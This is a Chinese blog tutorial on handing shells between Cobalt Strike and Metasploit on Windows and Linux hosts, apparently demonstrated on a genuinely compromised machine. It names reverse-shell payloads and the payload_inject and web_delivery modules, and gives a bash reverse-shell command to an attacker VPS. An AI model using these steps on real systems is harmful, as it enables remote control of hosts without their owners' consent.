• Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell



    前言

    实现Cobalt_Strike和Metasploit的联动,让shell在两者之间可以弹来弹去,因为两者的功能区别还是有的,两个工具都各有所长,所以为了更多的功能能够得到利用,两者之间的联动很有必要记录一下。


    提示:以下是本篇文章正文内容,下面案例可供参考

    一、Cobalt Strike的shell弹给msf(windows)

    首先,cs上面要有上线的主机,比如我就搞了一台windows的上线了,因为是mac电脑的原因我懒得弄虚拟机,所以又实战搞了一台来做演示,真的服了……好怀念windows ,只能打码了。
    上面是普通权限,下面是提权之后的。
    在这里插入图片描述
    cs上面有了,接下来就是把shell派生到msf,需要提前建立监听器,Payload设置成Foreign HTTP协议,Host就设置成装有msf的vps服务器地址,公网的。下面就是端口。

    在这里插入图片描述
    设置完监听器,msf也要配置一下:
    在这里插入图片描述
    msf上面的payload要和cs上面的类型协议保持一致,用http的。然后是设置监听的主机和端口,也要和cs上面的一致。
    在这里插入图片描述
    点击run开始监听,然后cs点击Spawn模块,派生shell给到msf:
    在这里插入图片描述
    发现报错了:
    在这里插入图片描述
    我仔细看了一下,原来是payload设置错了,应该是下面这个payload才对。

    选对payload

    windows/meterpreter/reverse_http
    
    • 1

    设置的步骤和前面的一样。

    然后再在cs点击Spawn,选中监听器,msf就成功获得shell了。

    在这里插入图片描述
    将msf的编码设置一下,就不会乱码了

    chcp 65001
    
    • 1

    在这里插入图片描述
    成功,和cs上面的一致。
    在这里插入图片描述

    二、msf反弹回cs(windows)

    上面我们用cs,把shell给到msf,那么接下来就是msf再给到cs。
    继续上面的操作,exit退出,再background把shell存到session里:
    在这里插入图片描述
    然后需要用到msf的local/payload_inject模块来进行反弹shell
    在这里插入图片描述
    这里的lhost和lpost就是cs上面监听器的配置,所以需要提前在cs上创建一个监听器:
    在这里插入图片描述
    在msf上面配置:
    在这里插入图片描述
    完成后直接exploit或者run:

    在这里插入图片描述

    cs立马上线。
    在这里插入图片描述

    三、目标Linux系统,cs反弹回msf

    这个我之前有写过,直接贴链接。很详细的说明。

    Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
    通过上面的办法,让一台linux系统的主机先上线到cs后,开始下一步的操作。
    下面我是又搞了台Linux的上线cs了:
    在这里插入图片描述
    将这个cs的shell再给到msf,用到的方法很简单,📢注意了,Linux的主机可不能再用cs的派生shell模块Spawn,是没办法用到。为了解决这个问题,要从Linux最本质的原理出发,它不是自带反弹shell的base -i么,直接用就完事了。

    先在msf上建立监听:
    在这里插入图片描述
    注意payload一定要选对,确定好Linux的系统版本.
    在这里插入图片描述

    然后监听的类型是反向连接的reverse,协议tcp。run或者exploit开始监听,然后在cs输入base -i 反弹shell命令:

    bash -i >& /dev/tcp/vpsip/2321 0>&1
    
    • 1

    发现不行,没有反映,我又试着用pyton的反弹shell命令,也是不行,前者是毫无反应,后者有反应,但是弹不回shell.

    在这里插入图片描述
    命令没错,具体为什么不行,我现在也不知道为什么,有知道的可以说一下。但是解决的办法肯定是有的,条条大路通罗马。

    web_delivery模块一条命令上线msf

    我思来想去,还得是用到这个模块:

    exploit/multi/script/web_delivery模块

    直接一条命令上线msf。操作如下:
    1、使用exploit/multi/script/web_delivery模块
    2、设置target目标,为set targer为Linux
    3、设置payload,payload是反向连接的类型reverse,
    tcp协议。
    4、run或exploit执行
    在这里插入图片描述
    运行后会出现一条命令,直接cs复制粘贴运行即可:
    在这里插入图片描述
    ok大功告成,msf成功接收到了session.
    完美!
    在这里插入图片描述
    执行命令也是没毛病:
    在这里插入图片描述

    四、目标Linux系统,msf反弹shell给cs

    那么,又到了最后一步,也是这次完整实验的最后一个,目标是Linux的,怎么给到cs。
    同样的,也可以用老方法:
    Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
    将Cross2C生成的文件在msf中执行它,cs就可以上线了,但是这个办法有点麻烦,因为要文件上传,搞来搞去的不是很方便。但是我又实在是找不到更容易的办法。
    Linux系统还是没有windows的渗透好搞,就是步骤比较麻烦一点,问题不大,如果有什么更好的办法,请大佬们告诉我。

    总结

    最全的Cobalt Strike和msf之间的联动实验了,我看网上都是东一块西一块,还没见过windows和linux系统合在一起说明的,今天我一次性把双系统,双工具之间的联动讲得明明白白。主要是最近加班多,脑子记忆力不太好,很多东西昨天学今天忘,一下子不做就容易忘记,又来百度找资料就很麻烦,而且很多抄袭甚至不成功的办法也贴出来,处处碰壁,所以干脆自己记一记,下次直接在自己主页搜就方便了。

        文章原创,欢迎转载,请注明文章出处: Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

  • 相关阅读:
    【数据结构】哈希表
    GaussDB向量数据库为盘古大模型再添助力
    1985-2023年6月全球各国经济政策不确定性数据
    nuxt脚手架
    鸿蒙应用开发之Hello World-1(续)
    1462_TC275_Lite_kit上的调试器使用
    im即时通讯开发应用保活之进程防杀
    Android Poco初始化时,不大起眼但可能存在坑点的参数们
    关于轨迹跟踪以及保持路径总时间的讨论结果
    FITC-PEG-FA,Folic acid-PEG-Fluorescein,叶酸PEG荧光素
  • 原文地址:https://blog.csdn.net/weixin_43847838/article/details/126709628